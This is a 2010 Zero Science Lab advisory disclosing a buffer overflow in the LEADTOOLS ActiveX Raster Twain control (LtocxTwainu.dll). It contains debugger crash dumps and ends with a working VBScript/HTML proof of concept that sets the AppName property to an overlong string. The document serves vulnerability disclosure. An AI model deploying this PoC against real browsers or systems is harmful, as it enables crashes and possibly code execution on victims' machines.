LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

2010-08-28T00:00:00
ID ZSL-2010-4960
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-08-28T00:00:00

Description

Title: LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
Advisory ID: ZSL-2010-4960
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 28.08.2010

Summary

With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications.

Description

The Raster Twain Object Library suffers from a buffer overflow vulnerability because it fails to check the boundry of the user input.

--------------------------------------------------------------------------------

(2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000 eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!wcscpy+0xe: 7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=???? 0:000> g (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041 eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!RtlpNtMakeTemporaryKey+0x6a74: 7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??
--------------------------------------------------------------------------------

Vendor

LEAD Technologies, Inc. - <http://www.leadtools.com>

Affected Version

16.5.0.2

Tested On

Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

Vendor Status

N/A

PoC

leadtrt.html

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.packetstormsecurity.org/filedesc/leadtrt-overflow.txt.html>
[2] <http://www.exploit-db.com/exploits/14824/>
[3] <http://securityreason.com/exploitalert/8865>
[4] <http://secunia.com/advisories/41177/>
[5] <http://osvdb.org/show/osvdb/67692>
[6] <http://www.securityfocus.com/bid/42823>

Changelog

[28.08.2010] - Initial release
[29.08.2010] - Added reference [3]
[30.08.2010] - Added reference [4]
[01.09.2010] - Added reference [5]
[26.10.2010] - Added reference [6]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC


Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.


Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)


===============================================================

(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000&gt; g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================


Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -&gt; 10014840 -&gt; Asc: @H@H
ECX 01649000
EDX 001839DC -&gt; Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -&gt; BAAD0008
EBP 0013EDA8 -&gt; 0013EDDC
ESP 0013EDA8 -&gt; 0013EDDC

--

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -&gt; 000000C8
EDX 00150608 -&gt; 7C97B5A0
EDI 00410041
ESI 00150000 -&gt; 000000C8
EBP 0013F228 -&gt; 0013F278
ESP 0013F220 -&gt; 00150000


ArgDump:
--------------------------------------------------
EBP+8	016479B0 -&gt; Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12	0018238C -&gt; Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16	00000000
EBP+20	0013EF6C -&gt; BAAD0008
EBP+24	100255BC -&gt; 10014840 -&gt; Asc: @H@H
EBP+28	0013EDB8 -&gt; 00000000

--

EBP+8	00150000 -&gt; 000000C8
EBP+12	00410039
EBP+16	7C96DBA4 -&gt; Asc: RtlGetUserInfoHeap
EBP+20	00000000
EBP+24	00410041
EBP+28	7C80FF12 -&gt; 9868146A


CompanyName		LEAD Technologies, Inc.
FileDescription		LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion		16,5,0,2
InternalName		LTRTNU
LegalCopyright		© 1991-2009 LEAD Technologies, Inc.
OriginalFileName		LTRTNU.DLL
ProductName		LEADTOOLS® for Win32
ProductVersion		16.5.0.0


Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False


Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E	MOV [ECX],AX	(ntdll.dll)
Disasm: 7C96C540	CMP BYTE PTR [EBX+7],FF	(ntdll.dll)


Exception Code: BREAKPOINT

Disasm: 7C90120E	INT3	(ntdll.dll)

Seh Chain:
--------------------------------------------------
1 	7C839AC0 	KERNEL32.dll
2 	FC2950 		VBSCRIPT.dll
3 	7C90E900 	ntdll.dll


7C912F4E	MOV [ECX],AX			&lt;--- CRASH
7C96C540	CMP BYTE PTR [EBX+7],FF		&lt;--- CRASH
7C90120F	RETN				&lt;--- CRASH


==================================================================


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

24.08.2010


Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php



PoC:


&lt;object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /&gt;
&lt;script language='vbscript'&gt;

targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1

arg1=String(9236, "A")

target.AppName = arg1

&lt;/script&gt;